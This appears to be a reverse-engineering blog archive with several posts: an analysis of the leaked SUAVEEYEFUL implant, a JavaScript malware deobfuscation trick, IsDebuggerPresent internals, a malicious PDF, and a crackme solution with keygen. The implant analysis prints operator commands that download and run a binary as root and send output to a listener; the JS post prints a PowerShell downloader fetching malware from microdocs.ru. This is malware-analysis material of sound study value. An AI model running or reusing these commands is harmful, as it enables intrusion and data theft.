xorl %eax, %eax

Archive for the ‘reverse engineering’ Category

The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP

leave a comment »

I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:

  • SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux
  • SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s
  • The leaked file/operation was targeting MiraPoint email products
  • SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware

The Leaked Files

In that directory there are a few different files. Those are:

  • bdes: A copy of the FreeBSD bdes (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD bdes version (from 22 Sep. 2000), but compiled on Linux in 2003.
  • decode-base64: Simple Perl decoding script using MIME::Base64.
  • implant: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).
  • implant.mg1.waseda.ac.jp: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University’s email gateway (variant of the implant file).
  • opscript.se: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.
  • se: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.
  • se.old: Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.

The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like ls, cat, telnet, etc.)

List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory


The se.old client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn ( as its configured SUAVEEYEFUL target.

This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even to today, this IP address ( still points to an email server from China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.

The current website hosted on mail.mfa.gov.cn

Most of the files included in the leaked directory were designed for another target. The email gateways of the Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”

The se client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.

  • mp450 (
  • mg1.waseda.ac.jp (
  • – another compromised host

The top host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance. And the other host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.

Simplified visualisation of the SUAVEEYEFUL installation process

Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers

This is clearly described in the opscript.se file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:

  1. Copy the implant to the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi file
  2. Change nph-help.cgi‘s file permissions to 555
  3. Change nph-help.cgi‘s ownership to “root” with group “nobody”
  4. Use touch -r to ensure file nph-help.cgi as well as anything under /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/ directory have the same timestamps as the legitimate /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html MiraPoint web service
  5. Use netcat to start a listening on port 444, decoding the received data with Base64 and decrypting them using bdes with a hardcoded key (0x4790cae5ec154ccc in this case)
  6. Connect-back from mp450‘s SUAVEEYEFUL implant to the listening 4444 port and provide some basic system information (who is logged in, list files/directories, etc.)

The SUAVEEYEFUL Software Implant

The SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple CGI program written in C for FreeBSD, and looking for input at its help endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).

The client side ensures that all requests are properly requested, encoded (using Base64) and encrypted (with DES). The client supported 4 options:

  • -h: Display help message
  • -c: Execute command
  • -i: Input target (e.g. the URL of a host running the SE server component)
  • -k: Key used for DES encryption
Screenshot of the se client used to target the Waseda University

As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:

head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'

The command was then structured with # being used as a separator. The main command to be executed was constructed with this:

echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out

Which results into a format that looks like that:

This structure was then encrypted using the hardcoded DES key, and passed through uriescape tool to ensure that there will be no parsing issues by the receiving MiraPoint web server.

Apart from the above, the client also used the date +”%N” command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.

The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component

Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:

  1. Install a fileless malware by doing the following:
    • Create a hidden directory (/tmp/.scsi)
    • Use curl to download a binary deceivingly named sendmail from the operational host (
    • Run sendmail as root and connect-back to the operational host on a different port (
    • Remove the sendmail binary file so that it’s running only in memory, not from the filesystem
  2. Execute commands with connect-back method:
    • Run w followed by ls -l and ls -l /tmp to get the logged in users and contents of the current and /tmp directories
    • Encrypt and encode the output
    • Send it to the operational host on its listening port (
    • The message also guides the operator on how to generate a new DES encryption key
  3. Same as #2 but without the Base64 encoding and DES encryption

Here is the full help message:

1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444


DO NOT -burn!!!
Use -exit

Written by xorl

June 22, 2022 at 10:19

Trick for quick reverse engineering of JavaScript malware

leave a comment »

Most JavaScript malware authors try to obfuscate their code by adding a lot of unused code as well as randomized variable names and simple encoding and decoding fucntions. Lastly, they typically remove all spaces and newlines. For example, “Сопроводительные.xls.js” is a JavaScript malware sample uploaded to VirusTotal about 2 hours ago. In this malware sample the code was obfuscated using Dean Edwards JavaScript packer. The malware is pretending to be a Microsoft Excel file but it is actually a JavaScript file. Here is how the sample looks like.

We can try to understand what it does and probably spend hours of analysis or we can do something much simpler. Run the obfuscated code through some prettifier, for example something like jsbeautifier.org. Then, just scrolling through the prettified JavaScript code you can easily see some variable that contains a some large string. In this case, just by looking at it it looks like a Base64 encoded string.

If we just copy this Base64 encoded string and decode it, we will get the following malicious PowerShell script that downloads and executes a variant of Smoke Loader malware from microdocs.ru.

cmd /c start /b powershell -WindowStyle Hidden 

$http_request = New-Object -ComObject Msxml2.XMLHTTP;
$adodb = New-Object -ComObject ADODB.Stream;

$path = $env:temp + '\57737.exe';
$http_request.open('GET', 'http://microdocs.ru/axls/svita.exe?rnd=1328', $false);

if($http_request.Status -eq "200")
	$adodb.type = 1;
	$adodb.position = 0;
} else {
	Write-Host $http_request.statusText;

Start-Process $path;

So, when reverse engineering a JavaScript malware, before trying to understand the whole obfuscated code, look for any large strings that are standing out. In this case the above analysis took me less than 5 minutes and as you can probably guess trying to de-obfuscate the entire obfuscated code would have taken at least a couple of hours. Hope that you found this trick useful. :)

Written by xorl

December 16, 2017 at 00:31

Reverse Engineering isDebuggerPresent()

with one comment

Disclaimer: I am not an experienced Windows guy. I know just the basics and still learning.

There have been tons of articles on how to bypass isDebuggerPresent(), the most widely used anti-debugging method in Windows. However, here we will go a little bit into what isDebuggerPresent() does internally. As we can read in Microsoft’s documentation, it comes with a very simple prototype from Kernel32 library.

BOOL WINAPI IsDebuggerPresent(void);

What we need to know is that isDebuggerPresent() is designed to perform just one task. Return a non-zero value if the current process is running in a user-mode debugger, and a zero value if it is not running in a user-mode debugger. If we load up the Kernel32 DLL (Dynamic-Link Library), we can quickly find the export of this routine. Basically, it is just a jump to an internal offset from DS (Data Segment) register.

This makes sense as Microsoft has moved a lot of the functionality from kernel32.dll and advapi32.dll to kernelbase.dll. So, if we load kernelbase.dll we will quickly locate the actual code behind isDebuggerPresent() which consists of a very simple operation.

Literally, the entire isDebuggerPresent() function is three assembly instructions. First, it stores the value of fs:30h register to EAX register, then copies the value of EAX+2 to the EAX register and lastly, it returns the value that EAX has.

mov     eax, large fs:30h
movzx   eax, byte ptr [eax+2]

The question now becomes, what does the FS segment register store in offset 0x30? The answer is common to any Windows people out there. In Windows, the FS segment register points to the Win32 TIB (Windows 32-bit Thread Information Block), a data structure that describes the currently running thread. In the 0x30 offset we have the linear address of the Process Environment Block (PEB). If you are interested in the rest of the TIB you can check the full mapping on Wikipedia.

This means that the first instruction retrieves the address of PEB data structure. The second instruction fetches the value that is stored two Bytes after the beginning of the PEB structure. Reading Microsoft’s documentation on PEB solves this mystery as this is where “BeingDebugged” is located. So, technically isDebuggerPresent() is returning whatever value “BeingDebugged” has.

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  BYTE                          Reserved4[104];
  PVOID                         Reserved5[52];
  BYTE                          Reserved6[128];
  PVOID                         Reserved7[1];
  ULONG                         SessionId;

The question now becomes, what can set _PEB.BeingDebugged to a non-zero value and why. The answer to this is the debugging API of Windows. When a request is made to attach a debugger to a process such as DebugActiveProcess() it will result to a call to DbgUiDebugActiveProcess() from the Windows Native API, known as NTDLL. Here is the equivalent disassembled code.

What we care about as you can easily guess, is the call to _NtDebugActiveProcess() function. This internal API call results in a system call (hex value 0x800C5) to “NtDebugActiveProcess” which is invoked via Wow64SystemServiceCall(). This is part of the NT Operating System kernel (ntoskrnl.exe), also known as the Windows kernel image. If we load the ntoskrnl.exe to IDA and find this system call’s code, we will see exactly how “BeingDebugged” is set.

As you can see “NtDebugActiveProcess” system call will eventually result in the invocation of DbgkpSetProcessDebugObject() function. A function that takes four arguments and is defined as you see below in the Windows internal kernel API prototype.

NTSTATUS NTAPI DbgkpSetProcessDebugObject(IN PEPROCESS Process,
		IN NTSTATUS      MsgStatus,
		IN PETHREAD  	 LastThread 

This routine is also part of ntoskrl.exe and what is interesting to us is at the very bottom of its code. You can see the exact snippet below. What we care about is the call to DbgkpMarkProcessPeb() function.

As it is suggested by its name, DbgkpMarkProcessPeb() will update the PEB of the process that it received as an argument to mark it as under debugging. Below you can see exactly where the “BeingDebugged” flag is set to TRUE (or FALSE) within DbgkpMarkProcessPeb().

The above code updates “Process->PEB->BeingDebugged” based on the value of “DebugPort”. If the “DebugPort” is enabled, it will set “Process->PEB->BeingDebugged” to the value of “DebugPort”, otherwise it will remain unset. The “DebugPort” is a value of the PEB structure which is initialized if the parent process (like a debugger) or the kernel was asked to to associate this process with a debug object. You can see the function that does this below.

Basically, this means that any time a debug object is created on the kernel for a process, the DbgkpMarkProcessPeb() will be invoked to ensure that “BeingDebugged” is set to TRUE in the PEB data structure of this specific process. Then, isDebuggerPresent() will simply fetch that value and return it to the user-space when called. As I mentioned in the intro, the scope of this post was not how to defeat the isDebuggerPresent() anti-debugging technique, but to understand how it works. Knowing the above should be sufficient to give you some ideas on how to do it. Just for reference, below are some ideas with a few different methods to bypass this check.

Written by xorl

November 20, 2017 at 16:23

Adobe Vulnerability on milw0rm

with 6 comments

I just had a look at that one and I think that this might be an exploit code for the vulnerability recently disclosed by iDefense or a similar one in FlateDecode. After you uudecode that file, and open hereEvil.pdf you’ll see a pattern similar to the following:

9 0 obj
/Type /XObject
/Subtype /Form
/FormType 1
/BBox &#91; 0.11133 -0.32275 0.22169 -1.01367 &#93;
/Resources << /ProcSet &#91;/PDF /Text /ImageB /ImageC /ImageI&#93;
/Length 263
/Filter /#46#6c#61#74#65#44#65#63#6f#64#65 >>
     Multiple similar streams
37 0 obj
<< /S /JavaScript /JS 34 0 R >>

In case you wonder, what that hexadecimal /Filter is, you can convert it to ASCII and you’ll get a nice FlateDecode. Now, skip the two images and text which is normally contained (and displayed) into the file and have a quick look at the Names array.

40 0 obj
<< /Names &#91; (6f2688a5fce7d48c8d19762b88c32c3b) 37 0 R (8ec7ff1ac324a4bed44cc51d362e5b94) 38 0 R (3acb2a202ae4bea8840224e6fce16fd0) 39 0 R &#93; >>
7 0 obj
<< /JavaScript 40 0 R >>

Those hashes are common MD5 hashes which are translated to:

6f2688a5fce7d48c8d19762b88c32c3b = 1944
8ec7ff1ac324a4bed44cc51d362e5b94 = 15345
3acb2a202ae4bea8840224e6fce16fd0 = 9174

And objects 37 0, 38 0 and 39 0 are Javascript entries which are invoking three FlateDecode streams like this:

37 0 obj
<< /S /JavaScript /JS 34 0 R >>
38 0 obj
<< /S /JavaScript /JS 35 0 R >>
39 0 obj
<< /S /JavaScript /JS 36 0 R >>

I haven’t converted/decoded those streams to describe it further. Also, according to the document’s entries, the document was created using Scribus PDF Library and it was last modified on 11 July 2009. If anyone messed around with those FlateDecode streams I’d be really happy to know what interesting they contain. :)

Written by xorl

July 23, 2009 at 16:33

cyclops’s NTS-Crackme10 Solution

leave a comment »

I found my solution for this crackme while cleaning up an old USB flash drive. So, here is my solution to this really cool crackme.
When you first run you’ll see something similar to this:


After browsing for a few minutes the code in IDA I spotted the reason why it was exiting when I was attempting to run it in a debugger. The reason is:

.text:0040129C loc_40129C:                             ; CODE XREF: sub_401260+36j
.text:0040129C                 push    offset LibFileName ; "kernel32.dll"
.text:004012A1                 call    ds:LoadLibraryA
.text:004012A7                 push    offset ProcName ; "IsDebuggerPresent"
.text:004012AC                 push    eax             ; hModule
.text:004012AD                 call    ds:GetProcAddress
.text:004012B3                 call    eax
.text:004012B5                 test    eax, eax
.text:004012B7                 jz      short loc_4012BD
.text:004012B9                 push    0               ; nExitCode
.text:004012BB                 call    edi ; PostQuitMessage

As you can see, it uses IsDebuggerPresent() from kernel32.dll and if this returns TRUE which means EAX will be non-zero, it will jump to loc_4012BD. Otherwise, it will just execute PostQuitMessage(0). There a number of ways to overcome this protection, the simplest one is to just patch the binary and make “test” instruction succeed every time. Another common way is to attach to the process after this code has been executed. In this case, attaching is easier since this check is performed only once during the initialization of the process. Just start the process normally in your Windows and then attach your favorite debugger to it! :)
And now, it is the time to fill every “sound interesting” function with breakpoints. Probably the most interesting one was the Cwnd::GetDlgItemTextA(int, char *, int). From MSDN we can see that this is an MFC (Microsoft Foundation Class) library routine, this is definitely not surprising. Just have a look at that binary and you will see that it makes wide use of MFC. So… After entering a username/password like AAAAAAAA/BBBBBBBB and pressing a quite a few F7 I saw this:

.text:004014BA loc_4014BA:                             ; CODE XREF: sub_401490+21j
.text:004014BA                 nop
.text:004014BB                 pop     eax
.text:004014BC                 lea     eax, [ebp+var_24]
.text:004014BF                 push    1Fh
.text:004014C1                 push    eax
.text:004014C2                 push    3E8h
.text:004014C7                 call    ?GetDlgItemTextA@CWnd@@QBEHHPADH@Z ; CWnd::GetDlgItemTextA(int,char *,int)
.text:004014CC                 mov     edi, eax
.text:004014CE                 push    ecx
.text:004014CF                 push    eax
.text:004014D0                 rdtsc
.text:004014D2                 xor     ecx, ecx
.text:004014D4                 add     ecx, eax
.text:004014D6                 rdtsc
.text:004014D8                 sub     eax, ecx
.text:004014DA                 cmp     eax, 0FFFh
.text:004014DF                 jb      short loc_4014E8
.text:004014E1                 add     [ebp+var_4], 3025h

The value stored in EAX, is our username as we can see from the stack at that moment:

Stack[00000488]:0012F884 var_24          db 41h
Stack[00000488]:0012F885                 db  41h ; A
Stack[00000488]:0012F886                 db  41h ; A
Stack[00000488]:0012F887                 db  41h ; A
Stack[00000488]:0012F888                 db  41h ; A
Stack[00000488]:0012F889                 db  41h ; A
Stack[00000488]:0012F88A                 db  41h ; A
Stack[00000488]:0012F88B                 db  41h ; A

Then, it invokes Cwnd::GetDlgItemTextA() in a way similar to: GetDlgItemTextA(0x1F, username, 0x03E8). The last value represents the maximum length and in decimal this is 1000. The subsequent mov edi, eax instruction is used to store the return value (EAX) of GetDlgItemTextA() which represents the length of the characters being copied not including the NULL termination to EDI register.
The next snippet makes use of rdtsc to retrieve the processor timestamp and store the result which is 64bit long to ECX and EAX. It zeros out ECX by XOR’ing it with it self and then adds to it the value of EAX (the lower value returned by rdtsc). It invokes rdtsc once again and then substracts the returned value from the one stored in EAX from the first call. If the comparison succeeds, which means that EAX is equal to 0xFFF (which is 4096 in decimal) it skips the add instruction since it jumps to loc_4014E8 which is the immediately next location.
In case that CMP fails, which means that it took some more time than the expected between the two instructions, then it adds 0x3025 (12325 in decimal) to a local variable. This is another nice little anti-debugging feature. It counts the execution time between the two rdtsc instructions and if it is longer than the expected (probably because of some debugger single stepping around) then it changes its behavior. Once again, there are countless ways to bypass this. You can patch it to add 0, you can NOP it, you can make the CMP succeed always, or you can simply set a breakpoint after that code, for example in loc_4014E8 and thus no execution time overhead. I patched it to be zero and now, after bypassing this let’s move to the loc_4014E8 code.

.text:004014E8 loc_4014E8:                             ; CODE XREF: sub_401490+4Fj
.text:004014E8                 nop
.text:004014E9                 pop     eax
.text:004014EA                 pop     ecx
.text:004014EB                 lea     ecx, [ebp+var_48]
.text:004014EE                 push    11h
.text:004014F0                 push    ecx
.text:004014F1                 push    3E9h
.text:004014F6                 mov     ecx, esi
.text:004014F8                 call    ?GetDlgItemTextA@CWnd@@QBEHHPADH@Z ; CWnd::GetDlgItemTextA(int,char *,int)

Here it just invokes Cwnd::GetDlgItemTextA() in a way similar to: GetDlgItemTextA(17, password, 1001). So… Continuing with this function we have:

.text:004014FD                 cmp     edi, 5
.text:00401500                 jle     short loc_40152F
.text:00401502                 cmp     eax, 5
.text:00401505                 jle     short loc_40152F

If you recall, EDI has the length of the username not including the NULL termination and from the previous call, EAX has the length of the password. If any of these two is less than 5 characters, it will jump to loc_40152F. This is something you really don’t want to happen since this code simply ends this function like this:

.text:0040152F loc_40152F:                             ; CODE XREF: sub_401490+70j
.text:0040152F                                         ; sub_401490+75j ...
.text:0040152F                 pop     edi
.text:00401530                 pop     esi
.text:00401531                 mov     esp, ebp
.text:00401533                 pop     ebp
.text:00401534                 retn

Assuming that our credentials are more than 5 characters, then the code that follows is this:

.text:00401507                 mov     edx, [ebp+var_4]
.text:0040150A                 lea     eax, [ebp+var_48]
.text:0040150D                 push    edx
.text:0040150E                 lea     ecx, [ebp+var_24]
.text:00401511                 push    eax
.text:00401512                 push    ecx
.text:00401513                 call    sub_4013D0
.text:00401518                 add     esp, 0Ch
.text:0040151B                 test    eax, eax
.text:0040151D                 jz      short loc_40152F
.text:0040151F                 push    0
.text:00401521                 push    0
.text:00401523                 push    offset aSerialIsCorrec ; "Serial is Correct!!!"
.text:00401528                 mov     ecx, esi
.text:0040152A                 call    ?MessageBoxA@CWnd@@QAEHPBD0I@Z ; CWnd::MessageBoxA(char const *,char const *,uint)

Now, EDX contains the username, EAX the password and then a call to sub_4013D0 is made with parameters like these: sub_4013D0(&username, &password, var_4). It is noteworthy here that if the rdtsc anti-debugging succeeded, then var_4 would be set to 12325 instead of 0 that it is normally. Anyway, keep these in mind and let’s continue with the execution.
After a useless ESP+0, it tests the return value of sub_4013D0 function. If it returns FALSE, then it will jump to loc_40152F which was demonstrated earlier, it will just terminate the routine. However, if it returns true it will call MessageBoxA(“Serial is Correct!!!”, 0, 0). We have reached our goal! We can now choose the easy path of just patching it and creating a crack file that changes the behavior of that test instruction or its equivalent jz or whatever. But the fun part is to reverse the sub_4013D0 and write a nice little key logger. Let’s do this.

It starts like this…

.text:004013D0 sub_4013D0      proc near               ; CODE XREF: sub_401490+83p
.text:004013D0 Dest            = byte ptr -0Ch
.text:004013D0 arg_0           = dword ptr  4
.text:004013D0 arg_4           = dword ptr  8
.text:004013D0 arg_8           = dword ptr  0Ch
.text:004013D0                 sub     esp, 0Ch
.text:004013D3                 xor     eax, eax
.text:004013D5                 xor     edx, edx
.text:004013D7                 push    ebx
.text:004013D8                 push    esi
.text:004013D9                 mov     esi, [esp+14h+arg_0]
.text:004013DD                 mov     cl, [esi]
.text:004013DF                 test    cl, cl
.text:004013E1                 jz      short loc_401422
.text:004013E3                 push    edi
.text:004013E4                 mov     edi, [esp+18h+arg_8]

So, we have our three arguments username, password and that anti-debugging counter. Then it allocates 12 bytes on the stack and zeroes out EAX and EDX. For convenience I renamed the argumets to user, pass and counter respectively. The next mov instruction stores the address of the username to ESI and the following one, uses the lower part of ECX (meaning the CL register) to get the first character of the username. If this is not NULL (meaning that test instruction succeeds), it will jump to loc_401422. Otherwise, it will push the current value of EDI in the stack and then store the anti-debugging counter to it. Assuming that our username has at least 6 characters, to pass a check shown earlier we can move on with the execution knowing that the test instruction will succeed. The following code is this:

.text:004013E8 loc_4013E8:                             ; CODE XREF: sub_4013D0+4Fj
.text:004013E8                 movsx   ecx, cl
.text:004013EB                 mov     ebx, ecx
.text:004013ED                 xor     ebx, 0C0C0C0C0h
.text:004013F3                 sub     ebx, edi
.text:004013F5                 add     ebx, edx
.text:004013F7                 imul    ebx, eax
.text:004013FA                 shl     ebx, 1
.text:004013FC                 mov     edx, ebx
.text:004013FE                 lea     ebx, [ecx+ecx*4]
.text:00401401                 xor     edx, ebx
.text:00401403                 and     ecx, 8000001Fh
.text:00401409                 jns     short loc_401410
.text:0040140B                 dec     ecx
.text:0040140C                 or      ecx, 0FFFFFFE0h
.text:0040140F                 inc     ecx

Ok… It moves the character of the username stored in CL to ECX in order to be able to perform various operations. For this reason it uses movsx that performs sign extension. It then moves it into ECX and XORs it with 0x0C0C0C0C0. It then subtracts from it the anti-debugging counter/value which is 0 if everything works as expected and increments EBX (username pointer) by EDX (which is 0 now). The next three instructions, imul, shl and mov are used to multiply and sign extend EAX (which is 0) with EBX (username character) and store the result to EDX. The next lea instruction is tricky, it’s used simply to multiply by five and store that result to EBX. The previous result stored in EDX and the one of the exact previous instruction in EBX are XOR’d. Next, ECX is masked with 0x8000001F and if the value isn’t less than zero, then jump to loc_401410. If this is not the case, decrement ECX and OR it with 0x0FFFFFFE0 and then increment it. Assuming that we have a positive value, the following code will be executed:

.text:00401410 loc_401410:                             ; CODE XREF: sub_4013D0+39j
.text:00401410                 shl     edx, cl
.text:00401412                 mov     cl, [eax+esi+1]
.text:00401416                 xor     edx, 0BADDC001h
.text:0040141C                 inc     eax
.text:0040141D                 test    cl, cl
.text:0040141F                 jnz     short loc_4013E8
.text:00401421                 pop     edi

The first instruction shifts left EDX register, and the next mov instruction retrives the next character of the username. EDX is then XOR’d with 0x0BADDC001 and EAX is incremented. If CL is not NULL it jumps back to loc_4013E8. So.. this is a simple loop. In C this could be represent it like:

for(c = *(char *)username; username; ++i)
   edx = 5 * c ^ 2 * i * (edx + (c ^ 0xC0C0C0C0) - counter);
   ecx = c & 0x8000001F;

   if (ecx < 0)
     ecx = ((--ecx) | 0xFFFFFFE0) + 1;

   edx = edx << ecx;
   c = *(char *) (i + user + 1);
   edx = edx ^ 0x0BADDC001;

With this in mind we can move on with this routine. The next code is fairly simple...

&#91;sourcecode language="c"&#93;
.text:00401422 loc_401422:                             ; CODE XREF: sub_4013D0+11j
.text:00401422                 push    edx
.text:00401423                 lea     eax, &#91;esp+18h+Dest&#93;
.text:00401427                 push    offset Format   ; "%08X"
.text:0040142C                 push    eax             ; Dest
.text:0040142D                 call    ds:sprintf
.text:00401433                 mov     esi, &#91;esp+20h+pass&#93;
.text:00401437                 add     esp, 0Ch
.text:0040143A                 lea     eax, &#91;esp+14h+Dest&#93;

What it does is basically sprintf(Dest, "%08X", edx). This means that the hex value is then stored into ESI and the final password into EAX. So, in C this code would be:

&#91;sourcecode language="c"&#93;
sprintf(dest, "%08X", edx);
esi = password;
eax = dest;

And let's move to the next disassembled code...

&#91;sourcecode language="c"&#93;
.text:0040143E loc_40143E:                             ; CODE XREF: sub_4013D0+90j
.text:0040143E                 mov     dl, &#91;eax&#93;
.text:00401440                 mov     bl, &#91;esi&#93;
.text:00401442                 mov     cl, dl
.text:00401444                 cmp     dl, bl
.text:00401446                 jnz     short loc_401473
.text:00401448                 test    cl, cl
.text:0040144A                 jz      short loc_401462

It moves the first character of the dest string into DL and the first of the password into BL registers. It then moves DL into CL and compares DL (aka the dest string character) with BL (the password character). If they are not equal it jumps to loc_401473, if they are, it checks that dest character, CL is not NULL. If it's NULL it jumps to loc_401462. The code continues like this:

&#91;sourcecode language="c"&#93;
.text:0040144C                 mov     dl, &#91;eax+1&#93;
.text:0040144F                 mov     bl, &#91;esi+1&#93;
.text:00401452                 mov     cl, dl
.text:00401454                 cmp     dl, bl
.text:00401456                 jnz     short loc_401473
.text:00401458                 add     eax, 2
.text:0040145B                 add     esi, 2
.text:0040145E                 test    cl, cl
.text:00401460                 jnz     short loc_40143E

It increments the pointers to point to the next characters and compares them once again. It iterates to this loop until it completes the string, meaning CL is NULL. In C this could be written like:

&#91;sourcecode language="c"&#93;
dl = *(char *)dest;
bl = *(char *)password;
	cl = dl;

	if (dl != bl)
          goto loc_401473;
	if(cl == NULL)
          goto loc_401462;

        dl = *(char *)dest++;
	bl = *(char *)password++;

	if (dl != bl)
	  goto loc_401473;
        dest += 2;
	password += 2;

	if (cl == NULL)
          goto loc_40143E;

So.. that's it! By the way, if you single step you can check out the value stored in dest using sprintf. This is the password we're looking for. In my case (user: AAAAAAAA) that was:

&#91;sourcecode language="c"&#93;
Stack&#91;00000D54&#93;:0012F83C Dest            db 37h
Stack&#91;00000D54&#93;:0012F83D                 db  41h ; A
Stack&#91;00000D54&#93;:0012F83E                 db  36h ; 6
Stack&#91;00000D54&#93;:0012F83F                 db  30h ; 0
Stack&#91;00000D54&#93;:0012F840                 db  33h ; 3
Stack&#91;00000D54&#93;:0012F841                 db  43h ; C
Stack&#91;00000D54&#93;:0012F842                 db  35h ; 5
Stack&#91;00000D54&#93;:0012F843                 db  42h ; B
Stack&#91;00000D54&#93;:0012F844                 db    0

And of course the result of entering this is...

<img src="https://xorl.files.wordpress.com/2009/07/2.jpg" alt="crackme2" title="crackme2" width="336" height="258" class="aligncenter size-full wp-image-1015" />

And obviously, with the above knowledge you can easily write a key generator for this application. Here is mine:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void usage(const char *);

main(int argc, char *argv[])
         if (argc != 2)
         char         *user = (char *) argv[1];
         char         *pass[10];
         char          ch;
         int           i = 0;
         long          edx, edx2, edx3 = 0;
         long          ecx;
         if (strlen(user) < 6)
            fprintf(stderr, "Username must be more than 5 characters long\n");
         memset(pass, 0, sizeof(pass));
         for(ch = *(char *)user; ch; ++i)
                edx = 5 * ch ^ 2 * i * (edx3 + (ch ^ 0xC0C0C0C0));
                ecx = ch & 0x8000001F;
                if (ecx < 0)
                  ecx  = ((--ecx) | 0xFFFFFFE0) + 1;
                edx2 = edx << ecx;
                ch = *(char *) (i + user + 1);
                edx3 = edx2 ^ 0xBADDC001;
         sprintf(&pass, "%08X", edx3);  
         fprintf(stdout, "\nUsername:\t%s\nPassword:\t%s\n", user, pass);
         return 0;

usage(const char *name)
            fprintf(stderr, "Usage: %s <username>\n", name);

Which as you can see here:


It works!


Written by xorl

July 8, 2009 at 06:22